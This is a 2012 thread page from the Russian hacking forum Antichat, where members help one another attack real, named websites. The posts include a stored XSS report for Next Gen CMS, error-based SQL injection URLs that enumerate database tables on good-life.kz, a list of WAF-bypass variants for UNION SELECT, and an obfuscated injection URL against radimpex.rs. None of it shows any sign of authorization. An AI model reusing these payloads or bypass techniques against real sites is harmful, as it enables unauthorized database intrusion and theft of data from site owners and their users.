HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20341  
Старый 12.04.2012, 23:12
justonline
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами: 7787126

Репутация: 53
По умолчанию

Цитата:
Сообщение от None  
Fatal error: Cannot use string offset as an array in /home/www/artwork/stroyprofi.ru/include/tree.inc on line 66
таки никак? раз идет проверка на то, какое значение ввожу, да?
 
Ответить с цитированием

  #20342  
Старый 13.04.2012, 02:22
kise
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами: 7519286

Репутация: -4
По умолчанию

Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.

Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?
 
Ответить с цитированием

  #20343  
Старый 13.04.2012, 10:21
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

Цитата:
Сообщение от kise  
Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.
Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?
Там фильтруется не только `FROM`. У них реализуется на уровне веб-сервера или демона эта шляпа. Очень жесткий фильтр. Ищи места в коде сайта, где данные транскодируются, передаются нестандартными GPC массивами или прямые аплоады и прочие финты ушами. Прямая скуль весьма сомнительно что-что тут тебе даст.
 
Ответить с цитированием

  #20344  
Старый 13.04.2012, 14:13
kise
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами: 7519286

Репутация: -4
По умолчанию

http://www.xakep.ru/howto/53202/Kak-obojti-zacshity-Sweb-i-Peterhost-hostingov.htm

Нашел статью, но походу они начали и POST фильтровать...

------------

Кто какие знает уязвимости в Next Gen CMS?
 
Ответить с цитированием

  #20345  
Старый 13.04.2012, 17:34
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от kise  
Кто какие знает уязвимости в Next Gen CMS?
Продукт: Next Gen CMS

Версия: 0.9.3 Release [SVN880+FIX01] (Последняя на данный момент)

Уязвимость: XSS Активные

При добавлении новости

Уязвимы поля: "Заголовок", 'тестовый блог

Код:
alert(/xss/)
Требуются права модератора или администратора

() mix0x0
 
Ответить с цитированием

  #20346  
Старый 13.04.2012, 23:05
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Фильтр при запросе union select.Можно ли как то обойти?
 
Ответить с цитированием

  #20347  
Старый 14.04.2012, 00:25
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

такой вопрос

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//good-life.kz/ru/cat.php?id=5'+and(select+1+from(select+count(*),concat((select+substr(concat_ws(0x3a,table_schema,table_name,table_rows),1,90)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+[/COLOR][/COLOR] 
какова он мне выдаёт что возвращается больше одного результата ответа? как исправить?
 
Ответить с цитированием

  #20348  
Старый 14.04.2012, 00:57
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Код:
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+1,1),64),rand(0)|0)+having+avg(0)+or'

http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+2,1),64),rand(0)|0)+having+avg(0)+or'

http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+3,1),64),rand(0)|0)+having+avg(0)+or'

http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+4,1),64),rand(0)|0)+having+avg(0)+or'
 
Ответить с цитированием

  #20349  
Старый 14.04.2012, 03:17
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от kingbeef  
Фильтр при запросе union select.Можно ли как то обойти?
Можно.

1. Запостить сюда ссылку.

2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).

Для начало надо определить, что именно фильтруеться.

Просто UNION

Просто SELECT

Связка UNION SELECT

Ну и т.д...

А потом уже действовать.

UNION(SELECT(1),2,version(),(4))

UNION+/*!SELECT*/+1,2,version(),4

/*!UNION+SELECT*/+1,2,version(),4

Попробовать передать данные через POST

Регистр

Вместо пробелов(+) использовать другие символы

И т.д...
 
Ответить с цитированием

  #20350  
Старый 14.04.2012, 10:45
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от Tigger  
Можно.
1. Запостить сюда ссылку.
2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).
Для начало надо определить, что именно фильтруеться.
Просто UNION
Просто SELECT
Связка UNION SELECT
Ну и т.д...
А потом уже действовать.
UNION(SELECT(1),2,version(),(4))
UNION+/*!SELECT*/+1,2,version(),4
/*!UNION+SELECT*/+1,2,version(),4
Попробовать передать данные через POST
Регистр
Вместо пробелов(+) использовать другие символы
И т.д...
http://www.radimpex.rs/download.php?id=-1/*|UnIoN*//*|aLl*//*|SeLeCt*/1--&lang=en
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.